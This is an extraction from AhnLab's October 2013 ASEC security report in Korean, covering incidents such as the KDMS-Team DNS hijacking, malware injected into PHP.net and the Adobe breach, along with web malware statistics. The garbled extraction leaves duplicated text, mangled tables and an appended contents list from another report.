해킹당한 6개홈페이지메인에는팔레스타인해커그룹 KDMS-Team이자신들의소행이며, 팔레스타인땅을빼앗겼다는글이올라왔다. Avira는홈페이지가직접해킹당한것이아니라고밝히며, 도메인관리업체인 Network Solutions의 DNS 레코드정보를변조해하이재킹당한것이라고발표했다.

16 ASEC REPORT 46 SECURITY TREND 16 보안동향 02. 보안이슈 스팸메일을발송하는다리미? 러시아국영방송 Rossiya 24 는지난 10월 29일일부중국산다리미에서 Wi-Fi 네트워크를이용해스팸메일을발송하는장치가발견돼수입을취소했다고전했다. 수입선적중에약간의무게차이가의심되어조사를해본결과 Wi-Fi 모듈이붙어있는칩을발견했으며, 이칩은 200미터이내에있는공개 AP( 비밀번호설정이되어있지않은 ) 에접속해스팸메일과악성코드를배포하도록설계돼있었다. 출처 : 공격자들이 SSL 인증서개인키에접근했을가능성이있어 site의인증서를폐기하고새로발급받을것이라고밝혔다. 그림 2-3 PHP.net 에올라온사고내용 방송동영상 : DNS 하이재킹을통한홈페이지해킹지난 10월 8일보안업체 AVG 와 Avira, 모바일메신져왓츠앱, 웹분석업체알렉사, 포르노웹사이트레드튜브, 호스팅업체리스웹의홈페이지가해킹됐다. 해킹당한 6개홈페이지메인에는팔레스타인해커그룹 KDMS-Team이자신들의소행이며, 팔레스타인땅을빼앗겼다는글이올라왔다. Avira는홈페이지가직접해킹당한것이아니라고밝히며, 도메인관리업체인 Network Solutions의 DNS 레코드정보를변조해하이재킹당한것이라고발표했다. DNS 레코드정보를변조해 Avira의 DNS 계정에대한비밀번호를리셋한후, 계정을획득한것으로알려졌다. 그러나해커그룹이이들 6개의사이트에대한비밀번호를어떻게획득했는지에대해서는알려진바가없다. 그림 2-2 다리미에달려있는 Wi-Fi 모듈 ( 출처 : Rossiya 24) PHP.net 해킹으로인한악성코드유포 대형웹사이트인 PHP.net이해킹을당해 10월 22일에서 24일까지접속자들에게악성코드를배포한것으로알려졌다. 이상황은구글의 Safe Browsing에의해발견됐다. PHP.net 관리자들은처음에는오진으로여겼으나, 조사결과 2개의서버가해킹을당해악성코드가유포됐음을확인했다. 공격자들은사이트내 4개의페이지에악성자바스크립트코드를삽입했다. PHP 소스코드는안전한것으로확인됐지만, 그림 2-4 하이재킹된 Avira 홈페이지

17 ASEC REPORT 46 SECURITY TREND 17 어도비해킹피해자, 3800만명으로증가지난 9월발생한어도비해킹사건과관련해당초 290만명의사용자정보가유출된것으로알려졌으나, 10월 29일에이수가 3800만명으로증가했다. 그러나지난 11월 6일 Jeremy Gosney 라는이름의사용자는한포럼에 1억 3천만명의사용자계정이유출이됐으며, 일부사용자계정의비밀번호가복호화된것으로보인다는글을올렸다. 이과정에서어도비계정사용자의일정정보를함께올려 2차피해도우려되고있다. 일부사용자의암호화된신용카드정보가같이유출된것으로알려졌으나, 이정보가복호화됐는지와해커들에의해어떻게사용됐는지는알려지지않았다. 그림 2-5 포럼에유출된어도비사용자계정정보

18 ASEC REPORT 46 WEB SECURITY TREND 18 웹보안동향 01. 웹보안통계 웹사이트악성코드동향 안랩의웹브라우저보안서비스인사이트가드 (SiteGuard) 를활용한웹사이트보안통계자료에의하 면, 2013 년 10 월웹을통한악성코드발견건수는모두 4228 건이었다. 악성코드유형은총 179 종, 악성코드가발견된도메인은 121 개, 악성코드가발견된 URL 은 432 개로각각집계됐다. 전월과비교 해웹을통한악성코드발견건수는증가했으나악성코드유형, 악성코드가발견된도메인, 악성코드 가발견된 URL 은감소했다. 표 년 10 월웹사이트보안현황 악성코드발견건수 4, 월 9 월 4, % 악성코드유형 악성코드가발견된도메인 악성코드가발견된 URL 월별악성코드배포 URL 차단건수 2013 년 10 월웹을통한악성코드발견건수는전월의 4015 건과비교해 5.3% 증가한 4228 건이었 다. 그림 3-1 월별웹을통한악성코드발견건수변화추이 20,000 15,000 10,000 5,000 5, % 4,015 4, % 5.3%

19 ASEC REPORT 46 WEB SECURITY TREND 19 월별악성코드유형 2013 년 10 월악성코드유형은전달 191 건에비해 93.7% 수준인 179 건이다. 그림 3-2 월별악성코드유형수변화추이 % 12.4% 6.3% 월별악성코드가발견된도메인 2013 년 10 월악성코드가발견된도메인은 121 건으로, 2013 년 9 월의 153 건과비교해 79.1% 수준 이었다. 그림 3-3 악성코드가발견된도메인수변화추이 % % 20.9% 월별악성코드가발견된 URL 2013 년 10 월악성코드가발견된 URL 은전월 466 건과비교해 92.7% 수준인 432 건이다. 그림 3-4 월별악성코드가발견된 URL 수변화추이 1, % % %

20 ASEC REPORT 46 WEB SECURITY TREND 20 월별악성코드유형 악성코드유형별배포수를보면트로이목마가 2321 건 (54.9%) 으로가장많았고, 애드웨어는 844 건 (20.0%), 스파이웨어는 164 건 (3.9%) 인것으로조사됐다. 유형 건수 비율 TROJAN 2, % ADWARE % SPYWARE % DOWNLOADER % DROPPER % Win32/VIRUT % APPCARE 2 0 % JOKE 1 0 % ETC % 4, % 표 3-2 악성코드유형별배포수 2,500 2,321 1, TROJAN ADWARE 그림 3-5 악성코드유형별배포수 SPYWARE DOWNLOADER DROPPER Win32/VIRUT APPCARE JOKE ETC 악성코드최다배포수 악성코드배포최다 10 건중에서는 Trojan/Win32.Onescan 이 967 건 (35.4%) 으로 1 위를차지했으며, Adware/Win32.InstallBrain 등 6 건이새로등장했다. 순위 등락 악성코드명 건수 비율 1 1 Trojan/Win32.Onescan % 2 2 ALS/Bursted % 3 NEW Adware/Win32.InstallBrain % 4 NEW Adware/Win32.DelBar % 5 NEW Trojan/Win32.Gen % 6 5 Spyware/Win32.Gajai % 7 NEW Win-Trojan/Downloader LU % 8 1 Win32/Induc % 9 NEW Trojan/Win32.KorAd % 10 NEW Trojan/Win32.ADH % TOTAL 2, % 표 3-3 악성코드배포최다 10건

21 ASEC REPORT CONTRIBUTORS 집필진 책임연구원 이영수 선임연구원 박종석 선임연구원 박시준 선임연구원 이도현 연구원 강민철 참여연구원 ASEC 연구원 편집 안랩세일즈마케팅팀 디자인 안랩 UX 디자인팀 감수전무조시행 발행처 주식회사안랩경기도성남시분당구삼평동 673 ( 경기도성남시분당구판교역로 220) T F Disclosure to or reproduction for others without the specific written authorization of AhnLab is prohibited AhnLab, Inc. All rights reserved.

< 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3. 악성코

월간악성코드은닉사이트탐지 동향보고서 (2 월 ) 2013. 03. 침해사고대응단 인터넷침해대응센터 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 9 3.